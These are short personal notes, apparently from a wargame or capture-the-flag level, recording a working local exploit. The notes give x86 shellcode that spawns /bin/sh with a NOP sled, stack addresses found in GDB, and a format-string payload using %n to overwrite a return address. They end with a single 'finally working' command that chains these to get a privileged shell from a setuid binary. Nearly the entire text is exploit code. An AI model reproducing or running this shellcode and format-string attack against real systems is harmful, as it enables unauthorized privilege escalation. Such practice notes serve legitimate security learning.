- Start empty environment with shell code set:
    env -i SHELL_CODE=`python -c "print('\x90'*128 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xbe\x2f\x2f\x73\x68\xc1\xee\x08\x56\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x31\xc0\xb0\x0b\xcd\x80')"`

- SHELL_CODE env with PWD and SHLVL variables:
    0xbfffff37


- Print value without padding:
    15 bytes

- EIP Stack location
    0xbffffd8c

- Appears to work in GDB:
    r `python -c "print('\xbf\xff\xf9\x7d'[::-1] + '%x%x%.12582896d%n' + 'A'*1024)"`


- Finaly working command:
env -i PWD=/tmp/rar SHLVL=0 SHELL_CODE=`python -c "print('\x90'*128 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xbe\x2f\x2f\x73\x68\xc1\xee\x08\x56\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\x31\xc0\xb0\x0b\xcd\x80')"` /levels/level09 `python -c "print('\xbf\xff\xf9\x7d'[::-1] + '%x%x%.12582896d%n' + 'A'*1024)"`
